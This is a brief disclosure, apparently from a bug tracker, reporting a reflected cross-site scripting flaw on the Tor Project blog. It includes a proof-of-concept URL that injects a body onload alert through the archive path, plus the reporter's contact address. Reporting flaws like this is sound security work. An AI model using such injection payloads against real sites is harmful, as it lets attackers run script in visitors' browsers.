Cross Site Scripting at TorProject Blog
GET parameter incorrectly filter GET query which allows attackers to execute JavaScript code which is called Cross Site Scripting.
https://blog.torproject.org/archive/1%3Cbody%20onload=alert%28666%29%3E/2013/11/,
Trac:
Username: patryk.bogdan@pentesters.pl